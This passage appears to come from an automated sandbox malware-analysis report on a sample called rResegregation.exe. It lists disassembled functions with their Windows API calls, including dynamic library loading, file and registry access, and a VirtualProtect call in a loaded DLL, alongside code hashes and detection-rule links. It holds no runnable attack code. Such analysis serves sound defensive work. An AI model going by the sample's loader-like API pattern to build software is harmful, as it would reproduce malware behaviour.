                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValue
                                                                  • String ID:
                                                                  • API String ID: 849931509-0
                                                                  • Opcode ID: f13fc71d1bfc05488ebc99773cab42a11541e056257782c7e60bd69959142faf
                                                                  • Instruction ID: 97ae11083f28a0faafd94fb7fe42009bced1e39793468f635283aee611ee1e77
                                                                  • Opcode Fuzzy Hash: f13fc71d1bfc05488ebc99773cab42a11541e056257782c7e60bd69959142faf
                                                                  • Instruction Fuzzy Hash: A2F04433A00110AFEB10BBA48A4EAAE7269AB50344F14443BF201B61C1DABD4D12966D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(000103CC), ref: 00401579
                                                                  • ShowWindow.USER32(000103C6), ref: 0040158E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: 819798dc53cfa1cdbbfc5d7e08787ba6897a8f53220b076d06f42c99be0ae6da
                                                                  • Instruction ID: 8b304e13c4ff4e58b2746d459b27b343ece49c0a97bab20a5a043a2c5b6af2c1
                                                                  • Opcode Fuzzy Hash: 819798dc53cfa1cdbbfc5d7e08787ba6897a8f53220b076d06f42c99be0ae6da
                                                                  • Instruction Fuzzy Hash: DEF0E577A082905FEB15CB64EDC086D7BF2EB8631075445BBD101A3691C2785C08C728
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004060A5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                    • Part of subcall function 00406037: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                    • Part of subcall function 00406037: wsprintfA.USER32 ref: 00406087
                                                                    • Part of subcall function 00406037: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                  • Instruction ID: 3e97459997e7f7d7039c0cd31b40a13ca7cd82e20333033f2d5c91e802436a08
                                                                  • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                  • Instruction Fuzzy Hash: 9DE08632644121AAD32097749E0493B72ACAA84751302093EF506F2180D7389C21A669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040597F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00405983
                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                  • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                  • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                  • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405468 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004030DF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040546E
                                                                  • GetLastError.KERNEL32 ref: 0040547C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                  • Instruction ID: c55d8aa437131a95a01de78b0052dcd3d9cc3f447ee629d771dafcce0f52932c
                                                                  • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                  • Instruction Fuzzy Hash: F5C04C30719601EAD6205B609E08B5B7D54AB54742F1045756546E10F0D6749451D92E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040255C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf
                                                                  • String ID:
                                                                  • API String ID: 2111968516-0
                                                                  • Opcode ID: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                  • Instruction ID: 2ad6ade0dd87bb00519d913a8aa863536615c58d60cd2f1651ee4e1b5922b607
                                                                  • Opcode Fuzzy Hash: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                  • Instruction Fuzzy Hash: D321DB70C04295BEDF318B584A985AF7B749B11314F1484BBE891B62D1C1BD8A85EB1D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402616 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                    • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  • Opcode ID: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                  • Instruction ID: 8aac78d75a064c4630454a8a93e19dff4664e4603579630d9101515f905a40da
                                                                  • Opcode Fuzzy Hash: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                  • Instruction Fuzzy Hash: 56E01A76A05640AAE701B7A5AE89CBE636ADB50318B20853BF601B00C1C6BD89059A3E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: b9d7ae82dfceeebafb3c3a0508530cee58bb4de42ef2dd8ecfa1f3aabca50655
                                                                  • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                                  • Opcode Fuzzy Hash: b9d7ae82dfceeebafb3c3a0508530cee58bb4de42ef2dd8ecfa1f3aabca50655
                                                                  • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                  • Instruction ID: f02d1f32d416435064830634415e16150983832f9e15cf27d1a8645227483e3a
                                                                  • Opcode Fuzzy Hash: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                  • Instruction Fuzzy Hash: 6EE0E676250108BFD700DFA9DD47FD577ECE758745F008421B609D7095C774E5508B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405A26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403057,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405A3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                  • Instruction ID: 202e9d0092b88ed1e300126467a6d0629c49e9ab1c26cc5f9aac99f6baf52130
                                                                  • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                  • Instruction Fuzzy Hash: FFE0EC3261425AAFDF10AEA59C44EEB7B6CFB05360F008533F915E2550D231E921DFA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004059F7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030A1,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                  • Instruction ID: ec62d6923e01247a1983afaeae7cc56c043784b3a51a97a909eefe23b1c45cc9
                                                                  • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                  • Instruction Fuzzy Hash: CFE04F32210259AFCF10AE549C40EAB375CEB04250F004432F915E2040D230E8119FA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
